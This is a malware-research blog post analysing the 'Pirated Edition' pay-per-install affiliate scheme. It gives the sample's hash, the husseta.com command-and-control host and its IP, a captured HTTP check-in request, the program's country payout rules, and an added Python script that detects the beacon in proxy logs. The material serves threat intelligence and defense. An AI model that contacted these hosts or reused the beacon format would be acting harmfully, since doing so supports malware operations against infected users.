MalwareIntelligence is a site dedicated to research on all matters relating to anti-malware security, computer criminology and information security in general, always from a perspective closely related to the field of intelligence.

15.8.10

Pirated Edition. Affiliate program Pay-per-Install

Affiliate programs are an increasingly profitable business model for criminals. Among many other alternatives, they build a complete circuit of malware distribution and infection by rewarding their customers with a percentage of the money obtained, according to the success of each customer's own business.

One of the systems with the greatest uptake in this business model is pay-per-install, in which each customer is paid for every installation of the malware. That is, the customer only has to propagate the malware and wait for someone to become infected.

In this circuit, each member can be either a single person or a botnet, since the economic return that the affiliate system pays the offender for spreading the malware is obviously multiplied at scale, and the botmaster obtains a larger economic gain within a shorter time span, on top of the other sources of fraudulent income generated by botnets.

Another of these affiliate programs is Pirated Edition, whose access panel can be seen in the picture below.


Looking into the affiliate system, we find an extremely minimalist model that only allows the client-offender to check the amount of money earned and to download the malware to be spread, including its updates.


This malicious code, whose default name is limew.exe (757eda0929b94ea104a1a80825dee3e2), has a very low detection rate. According to the VirusTotal report, it is detected by only 8 of 41 AV engines.

When run, it reports to the real affiliate program behind this criminal circuit, which in this case answers at husseta.com.

/get2.php?c=ROBFNNDI&d=26606B67393C34322E64636F317E3E3D2121222B25263078747D456E757923271416411A111410015D404E1618156A1971090A03700302010C090B7D7D0C07790305727474047E060C7072786A2F27212634206E6563677130303E666C6E3866505404004204020A55584C041F1B0B1D4D442D42522A021413444A4B4C494E4CB3B5B7B0A2F5F4E8EBB4CFF3FCE1E1FDF5E3BCD6CCD0B0FBFCA8C5FEA1ACB8FCCCCFD6FCC1989681DF9F9E969C8BC892808394D7D1D9D7CE85898A8B8C8D8E8FF1E7A1ADA0A9FBAAA9A5BDAABEA8E3BDB5A2B7B2B7BDF8BBB7BABBB7B8B2B3BE898FC48A80849282D5D8D8D3DDDAD6DDC8C7C6D5B1BAA4 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host: 011607da0826.husseta.com
Cache-Control: no-cache


However, this is only one side of the strategy: the same IP address (95.211.98.246) resolves for other domains, each of which carries the same template.


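The check-in captured above has a recognisable shape: a 12-hex-character leftmost hostname label, the /get2.php path, an 8-letter value in c= and a long uppercase-hex blob in d=. The following detection script is an added example, not code from the original post: it scores proxy log lines on those traits so that the same template is flagged regardless of which domain on that IP it contacts. The log format, the trait length thresholds and every hostname other than the husseta.com one quoted in the post are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Traits of the check-in seen in the post; the length thresholds are
# assumptions derived from that single captured request.
HEX_LABEL = re.compile(r"^[0-9a-f]{12}$")
CAMPAIGN_ID = re.compile(r"^[A-Z]{8}$")
HEX_BLOB = re.compile(r"^[0-9A-F]{32,}$")

def classify_request(host, request_line):
    """Return the list of beacon traits one proxied request exhibits."""
    traits = []
    if HEX_LABEL.match(host.split(".")[0]):
        traits.append("hex-label-host")
    method, _, rest = request_line.partition(" ")
    target = rest.split(" ", 1)[0] if method == "GET" else ""
    parts = urlsplit(target)
    if parts.path == "/get2.php":
        traits.append("get2-path")
        query = parse_qs(parts.query)
        c, d = query.get("c", [""])[0], query.get("d", [""])[0]
        if CAMPAIGN_ID.match(c) and HEX_BLOB.match(d):
            traits.append("c-d-params")
    return traits

def scan_log(text):
    """Return (timestamp, client, host, traits) for lines showing >= 2 traits."""
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, host, request = line.split(" ", 3)
        traits = classify_request(host, request)
        if len(traits) >= 2:
            hits.append((ts, client, host, traits))
    return hits

# Constructed proxy log: "timestamp client host request-line". Line 1 mirrors
# the capture in the post (d= shortened); the other lines are made up.
SAMPLE_LOG = """\
2010-08-15T10:00:01 10.0.0.5 011607da0826.husseta.com GET /get2.php?c=ROBFNNDI&d=26606B67393C34322E64636F317E3E3D2121222B25263078747D HTTP/1.1
2010-08-15T10:00:02 10.0.0.7 www.example.org GET /index.html HTTP/1.1
2010-08-15T10:00:03 10.0.0.9 0a1b2c3d4e5f.affiliate-example.test GET /get2.php?c=QWERTYUI&d=00112233445566778899AABBCCDDEEFF0011223344 HTTP/1.1
2010-08-15T10:00:04 10.0.0.5 cdn.example.net GET /get2.php?c=x&d=y HTTP/1.1
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Requiring two traits keeps an ordinary site that happens to serve a /get2.php page (the last sample line) out of the alerts while still catching the template on a domain not in any blocklist.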

It's worth mentioning a particular detail of this affiliate program's policies. To obtain payment for each installation of the malware, the infected computers must be located in one of the following countries: Australia, Belgium, Brazil, Canada, Czech Republic, Denmark, Estonia, France, Germany, Greece, Finland, Hungary, Italy, Ireland, Kuwait, Lithuania, Mexico, Netherlands, New Zealand, Norway, Poland, Portugal, Romania, Russia, Saudi Arabia, Singapore, Slovakia, Spain, Sweden, Switzerland, Turkey, Ukraine, United Arab Emirates, United Kingdom, United States and Japan. As payment systems it uses the services of Epassporte, AlertPay, PayPal and Webmoney.
